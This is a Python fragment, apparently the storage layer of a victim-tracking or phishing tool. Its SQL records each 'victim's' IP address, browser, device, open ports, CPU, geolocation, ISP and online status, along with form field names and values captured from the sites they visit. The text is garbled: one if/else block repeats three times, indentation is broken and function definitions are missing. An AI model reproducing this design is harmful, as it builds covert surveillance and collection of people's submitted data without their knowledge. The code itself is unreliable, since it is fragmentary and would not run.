\tif type(sentence) is str:
\tself.cursor.execute(sentence)
\telse:
\tself.cursor.execute(sentence[0], sentence[1])
if type(sentence) is str:
\tself.cursor.execute(sentence)
\telse:
\tself.cursor.execute(sentence[0], sentence[1])
if type(sentence) is str:
\tself.cursor.execute(sentence)
\telse:
\tself.cursor.execute(sentence[0], sentence[1])
\t\'get_data\' : "SELECT victims.*, geo.*, victims.ip AS ip_local, COUNT(clicks.id) FROM victims INNER JOIN geo ON victims.id = geo.id LEFT JOIN clicks ON clicks.id = victims.id GROUP BY victims.id ORDER BY victims.time DESC",
\t\'all_networks\' : "SELECT networks.* FROM networks ORDER BY id",
\t\'get_preview\' : ("SELECT victims.*, geo.*, victims.ip AS ip_local FROM victims INNER JOIN geo ON victims.id = geo.id WHERE victims.id = ?" , vId),
\t\'id_networks\' : ("SELECT networks.* FROM networks WHERE id = ?", vId),
\t\'get_requests\' : "SELECT requests.*, geo.ip FROM requests INNER JOIN geo on geo.id = requests.user_id ORDER BY requests.date DESC, requests.id ",
\t\'get_sessions\' : "SELECT COUNT(*) AS Total FROM networks",
\t\'get_clicks\' : "SELECT COUNT(*) AS Total FROM clicks",
\t\'get_online\' : ("SELECT COUNT(*) AS Total FROM victims WHERE status = ?", vId)
\treturn self.sql_execute(self.prop_sentences_stats(type, vId))
\tt = (data,)
\treturn ("SELECT COUNT(*) AS C FROM victims WHERE id = ?" , t)
\tt = (data,)
\treturn ("SELECT COUNT(*) AS C FROM clicks WHERE id = ?" , t)
\tt = (data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online', data[1],)
\treturn ("UPDATE victims SET ip = ?, date = ?, bVersion = ?, browser = ?, device = ?, ports = ?, time = ?, cpu = ?, status = ? WHERE id = ?", t)
\tt = (data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua, data[1],)
\treturn ("UPDATE geo SET city = ?, country_code = ?, country_name = ?, ip = ?, latitude = ?, longitude = ?, metro_code = ?, region_code = ?, region_name = ?, time_zone = ?, zip_code = ?, isp = ?, ua=? WHERE id = ?", t)
\tt = (data[1], data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online',)
\treturn ("INSERT INTO victims(id, ip, date, bVersion, browser, device, ports, time, cpu, status) VALUES(?,?, ?,?, ?,?, ?, ?, ?, ?)", t)
\tt = (data[1], data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua,)
\treturn ("INSERT INTO geo(id, city, country_code, country_name, ip, latitude, longitude, metro_code, region_code, region_name, time_zone, zip_code, isp, ua) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)" , t)
\treturn ("SELECT COUNT(*) AS C FROM networks WHERE id = ? AND network = ?", (data[0], data[1],))
\treturn ("DELETE FROM networks WHERE id = ?", (data[0],))
\treturn ("UPDATE networks SET date = ? WHERE id = ? AND network = ?" , (data[2], data[0], data[1],))
\tt = (data[0], data[1], data[2], data[3], data[4],)
\treturn ("INSERT INTO networks(id, public_ip, ip, network, date) VALUES(?,?, ?, ?,?)" , t)
\tt = (data[0].sId, data[0].id, data[0].site, data[0].fid, data[0].name, data[0].value, data[1],)
\treturn ("INSERT INTO requests(id, user_id, site, fid, name, value, date) VALUES(?, ?,?, ?, ?,?, ?)" , t)
\treturn ("INSERT INTO clicks(id, site, date) VALUES(?, ?,?)", (data[0], data[1], data[2],))
\treturn ("UPDATE victims SET status = ? WHERE id = ?" , (\'online\', data[0],))
\treturn ("UPDATE victims SET status = ? ", (\'offline\',))
\treturn ("UPDATE victims SET status = ? WHERE id = ?" , (\'offline\', data,))
\treturn False
\treturn self.sql_insert(self.prop_sentences_victim(type, data))
\treturn self.sql_one_row(self.prop_sentences_victim(type, data), column)
\treturn self.sql_execute(self.prop_sentences_victim(type, data))
